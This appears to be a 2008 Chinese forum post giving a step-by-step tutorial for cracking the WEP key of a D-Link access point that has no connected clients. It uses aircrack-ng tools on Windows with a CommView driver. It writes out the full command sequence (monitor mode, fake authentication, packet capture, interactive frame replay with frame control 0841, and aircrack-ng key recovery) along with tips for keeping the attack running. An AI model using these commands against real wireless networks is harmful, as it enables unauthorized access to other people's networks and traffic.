|
试验环境 ap:d-link 724 (没有任何有线和无线连接) os:windows 网卡:atheros 驱动版本为commview 4.2.2.104 下面的操作在windows下linux下原理相同 第一步 (打开监视模式) airserv-ng -c 1 -d "commview.dll|debug" -c 1 (监视通道1)
第二步 (使用 fake authentication 攻击方式) aireplay-ng -1 0 -e <ap essid> -a <ap bssid> -h <网卡mac> 127.0.0.1:666 第三步 (捕捉包) airodump-ng -c 1 -w cap 127.0.0.1:666 第四步 (使用 interactive frame selection)这一步是关键 aireplayer-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -h <网卡mac> -b <ap bssid> 127.0.0.1:666 解释 -p 0841 即将frame control 设置为 0841 运行这个命令后屏幕显示读包我测试的时候一般要读1-3万个包多个包(这个过程较长) 读到了一定数量后就会有下面的画面显示 一定要放弃第一个包(我测试的时候基本上放弃3个包以上)不然这个进程会死掉无法继续了
注意这张解图 BSSID = 00:0F:3D:32:BD:5D(ap mac) 并且 Source MAC = 00:0F:3D:32:BD:5D(ap mac) 测试几次都是一样的!! 然后开始发包了 可以看到 airodump-ng窗口的数据在增长
最后使用aircrack-ng破解了 aircrack-ng cap-01.cap ---------------------- 后记:这篇文章写得较为粗糙可能有些网友看不太明白较为基础的可以参看我的 http://forum.anywlan.com/dispbbs.asp?BoardID=15&ID=7225&replyID=&skin=1 有时间我会将该片文章的windows批处理文件写好的! | 
A友
发表于 2008-1-20 14:16
IP卡
狗仔卡
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
悔悟卡
匿名卡
